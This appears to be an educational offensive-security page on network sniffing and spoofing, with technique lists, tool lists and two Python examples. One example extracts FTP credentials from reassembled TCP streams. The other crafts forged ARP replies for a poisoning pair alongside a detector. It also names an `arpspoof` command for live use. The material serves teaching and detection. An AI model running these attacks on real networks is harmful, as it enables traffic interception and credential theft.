Sniffing & Spoofing
Sniffing
Sniffing captures and inspects network traffic in real time, extracting headers, payloads, and session metadata. It exposes credentials, tokens, and protocol weaknesses, and builds situational awareness before or during exploitation. On a switched network a passive sniffer sees only broadcast traffic and frames addressed to its own interface, so full visibility needs a mirror port or an active spoofing position.
Common Techniques
- Capturing raw packets with promiscuous (wired) or monitor-mode (802.11) interfaces
- Filtering traffic by IP, port, or protocol (BPF expressions such as tcp port 21) to isolate valuable data
- Reassembling TCP streams to read clear-text credentials
- Following unencrypted protocols (HTTP, Telnet, SMTP, FTP) for rapid intel
- Leveraging port mirroring, SPAN, or hub-based topologies for full-duplex capture
- Decrypting TLS when the server's private key (RSA key exchange only; forward-secret suites defeat this) or exported session secrets (e.g., an SSLKEYLOGFILE) are available
- Extracting files, images, and VoIP calls directly from packet flows
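The filter-and-reassemble steps above, as an added example that is not code from the page or from any tool it lists: a minimal Ethernet/IPv4/TCP dissector that applies a port filter, orders segments by sequence number (tolerating out-of-order delivery and retransmissions), and pulls USER/PASS out of an FTP control stream. The frames, addresses and credentials are constructed inline with the `build_tcp_frame` helper (checksums left at zero); nothing is captured from or sent to a real network.

```python
"""Sniffing in miniature: dissect frames, filter by port, reassemble a
TCP stream and read clear-text FTP credentials out of it.

Added example; the sample frames are constructed, not captured."""
import struct
from collections import defaultdict

ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
PROTO_TCP = 6


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(b):
    return ".".join(str(o) for o in b)


def build_tcp_frame(src_ip, dst_ip, sport, dport, seq, payload):
    """Constructed sample frame: Ethernet + IPv4 + TCP (PSH/ACK) + payload.
    Checksums are zero because these bytes are only parsed, never sent."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, seq, 0,
                      (5 << 12) | 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64,
                     PROTO_TCP, 0, ip_bytes(src_ip), ip_bytes(dst_ip))
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") \
        + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + tcp


def parse_frame(frame):
    """Ethernet -> IPv4 -> TCP dissection. Returns None for anything else."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[0] >> 4 != 4 or ip[9] != PROTO_TCP or len(ip) < ihl + 20:
        return None
    tcp = ip[ihl:total_len]
    sport, dport, seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    return {
        "src_ip": ip_str(ip[12:16]), "dst_ip": ip_str(ip[16:20]),
        "sport": sport, "dport": dport, "seq": seq,
        "payload": tcp[(off_flags >> 12) * 4:],
    }


def reassemble(frames, port):
    """Keep segments touching `port` (what a BPF 'tcp port N' filter does),
    group them per flow and order by sequence number, so out-of-order
    arrival and retransmissions do not matter. Overlapping segments are
    not handled here; a real reassembler must deal with them."""
    flows = defaultdict(dict)
    for frame in frames:
        p = parse_frame(frame)
        if p is None or port not in (p["sport"], p["dport"]):
            continue
        key = (p["src_ip"], p["sport"], p["dst_ip"], p["dport"])
        flows[key].setdefault(p["seq"], p["payload"])  # first copy wins
    return {k: b"".join(segs[s] for s in sorted(segs)) for k, segs in flows.items()}


def extract_ftp_credentials(stream):
    """USER and PASS travel in the clear on the FTP control channel."""
    creds = {}
    for line in stream.split(b"\r\n"):
        verb, _, arg = line.partition(b" ")
        if verb.upper() == b"USER":
            creds["user"] = arg.decode("ascii", "replace")
        elif verb.upper() == b"PASS":
            creds["password"] = arg.decode("ascii", "replace")
    return creds


def sniff_ftp_credentials(frames):
    """Credentials from every client->server FTP control flow, keyed by (src, dst)."""
    found = {}
    for (src, _sport, dst, dport), stream in reassemble(frames, 21).items():
        if dport == 21:
            creds = extract_ftp_credentials(stream)
            if creds:
                found[(src, dst)] = creds
    return found


# Constructed sample capture: segments arrive out of order, one is
# retransmitted, one is ARP (not TCP) and one is HTTP (filtered out).
CLIENT, SERVER, CPORT = "10.0.0.5", "10.0.0.9", 51234
SAMPLE_FRAMES = [
    build_tcp_frame(SERVER, CLIENT, 21, CPORT, 5000, b"220 ftp ready\r\n"),
    build_tcp_frame(CLIENT, SERVER, CPORT, 21, 1012, b"PASS hunter2\r\n"),
    bytes.fromhex("ffffffffffff") + bytes.fromhex("66778899aabb")
    + struct.pack("!H", ETHERTYPE_ARP) + bytes(28),
    build_tcp_frame(CLIENT, "93.184.216.34", 40000, 80, 1, b"GET / HTTP/1.1\r\n"),
    build_tcp_frame(CLIENT, SERVER, CPORT, 21, 1000, b"USER alice\r\n"),
    build_tcp_frame(CLIENT, SERVER, CPORT, 21, 1000, b"USER alice\r\n"),
]

if __name__ == "__main__":
    print(sniff_ftp_credentials(SAMPLE_FRAMES))
```

The same logic applied to a real capture is `tshark -r capture.pcap -Y 'ftp.request.command == "USER" || ftp.request.command == "PASS"'`, or Wireshark's Follow TCP Stream; the point of writing it by hand is to see that the filter and the sequence-number ordering are all a sniffer needs to turn scattered segments back into a readable login.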
Tools
- Wireshark (GUI packet analyzer with deep protocol dissection)
- tcpdump (lightweight CLI sniffer for scripted captures)
- tshark (Wireshark’s CLI engine for remote or headless use)
- Bettercap (modular MITM framework with live packet capture)
- Zeek (formerly Bro; network security monitor that logs and scripts traffic events)
- Scapy (Python library for custom packet crafting and sniffing)
- PcapPlusPlus-based scripts (C++ library wrapping libpcap/Npcap for custom capture and parsing automation)
Spoofing
Spoofing forges network identity to redirect traffic, hijack sessions, or bypass access controls. By masquerading as trusted hosts or infrastructure, an operator gains man-in-the-middle positions, network access, and lateral movement capability.
Common Techniques
- MAC spoofing to bypass wireless MAC filtering or port-based NAC
- ARP cache poisoning (unsolicited ARP replies that hosts accept without having asked) to position a MITM node inside switched LANs
- DNS spoofing to deliver malicious IPs for trusted domains
- IP spoofing in stateless protocols (e.g., UDP) to mask source or trigger reflection
- DHCP spoofing for rogue gateway injection and traffic capture
- Email header spoofing to improve phishing credibility
- LLDP/CDP spoofing to influence network device topology views
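ARP cache poisoning from both sides, as an added example that is not code from the page or from arpspoof or Bettercap: the two forged replies an attacker emits to sit between a victim and its gateway, and the IP-to-MAC binding check a defender runs to spot them (the heuristic arpwatch uses). The MAC and IP addresses are made up, and the frames are only built as bytes; nothing is put on the wire.

```python
"""ARP cache poisoning: crafting the forged replies and detecting them.

Added example; addresses are made up and no frame is sent."""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed lab addresses.
ATTACKER_MAC = "de:ad:be:ef:00:01"
VICTIM_MAC, VICTIM_IP = "aa:bb:cc:00:00:10", "192.168.1.10"
GATEWAY_MAC, GATEWAY_IP = "aa:bb:cc:00:00:01", "192.168.1.1"


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(b):
    return ".".join(str(o) for o in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Unsolicited ARP reply 'sender_ip is at sender_mac', unicast to target.
    Most stacks update their cache from such a reply without ever having
    sent a request, which is the weakness poisoning relies on."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet/IPv4, 6- and 4-byte addresses
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Both halves of a full-duplex MITM: the victim learns the gateway's IP
    at the attacker's MAC, and the gateway learns the victim's IP there too.
    Tools resend these periodically because cache entries age out; the
    attacker must also forward traffic or the victim simply loses connectivity."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),
    ]


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip) or None."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    b = frame[22:42]
    return op, mac_str(b[0:6]), ip_str(b[6:10]), mac_str(b[10:16]), ip_str(b[16:20])


class ArpWatch:
    """Learns IP->MAC bindings from replies and alerts when a known IP turns
    up with a different MAC. The first-seen binding is kept rather than
    overwritten, so every later poison frame keeps alerting; an IP the
    watcher has never seen legitimately cannot be flagged, which is why
    such monitors need a warm-up period on a clean network."""

    def __init__(self):
        self.bindings = {}
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            return None
        _, sender_mac, sender_ip, _, _ = parsed
        known = self.bindings.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            alert = f"{sender_ip} moved from {known} to {sender_mac}"
            self.alerts.append(alert)
            return alert
        return None


def demo():
    """Two legitimate replies, then the poisoning pair; returns the alerts."""
    watch = ArpWatch()
    watch.observe(build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP))
    watch.observe(build_arp_reply(VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP))
    for frame in poison_pair(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP):
        watch.observe(frame)
    return watch.alerts


if __name__ == "__main__":
    for line in demo():
        print("ALERT:", line)
```

Sending the frames for real would be `sendp(Ether(bytes)...)` in Scapy with raw-socket privileges, or simply `arpspoof -i eth0 -t <victim> <gateway>` with IP forwarding enabled; the detection side is what a defender can drop into a Zeek or arpwatch-style monitor, and the same binding-change logic is what switches implement as Dynamic ARP Inspection.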
Tools
- arpspoof (classic ARP poisoning utility in dsniff suite)
- Bettercap (real-time ARP, DNS, and DHCP spoofing with interactive console)
- Ettercap (MITM framework supporting ARP, DNS, and SSL stripping)
- macchanger (quick MAC address changer for Linux)
- Responder (LLMNR/NBT-NS/mDNS poisoner with rogue SMB/HTTP/LDAP servers that capture the NTLM authentication coerced from victims)
- Scapy (crafts arbitrary Ethernet/IP packets for advanced spoofing scenarios)
- hping3 (raw-packet generator for IP-level spoofing, testing, and DoS research)
- ip link / ifconfig (manual MAC spoofing: take the interface down, set the new hardware address, bring it back up)